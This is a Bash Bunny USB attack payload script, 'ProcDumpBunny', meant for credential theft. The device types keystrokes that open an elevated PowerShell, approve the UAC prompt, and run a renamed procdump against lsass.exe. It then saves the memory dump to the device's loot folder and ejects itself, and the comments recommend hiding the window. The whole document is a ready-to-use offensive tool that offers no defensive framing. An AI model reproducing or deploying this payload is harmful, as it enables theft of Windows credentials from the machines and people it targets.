#!/bin/bash
#
# Title:         ProcDumpBunny
# Description:   Dump lsass.exe with a renamed version of procdump
# Author:        0iphor13
# Version:       1.0
# Category:      Credentials
# Attackmodes:   HID, Storage

LED SETUP

Q DELAY 500

GET SWITCH_POSITION
DUCKY_LANG de

Q DELAY 500

ATTACKMODE HID STORAGE

#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING

LED STAGE1

#After you have adapted the delays for your target, add "-W hidden"
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
#Depending on your language - you need to change this - english layout: "Q ALT y" for example
Q ALT j
Q DELAY 250

Q DELAY 250
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Bunny.exe -ma lsass.exe out.dmp')"
Q DELAY 250
Q STRING " ;mv out.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
Q DELAY 250
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
Q DELAY 250
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
Q DELAY 300
Q ENTER

LED FINISH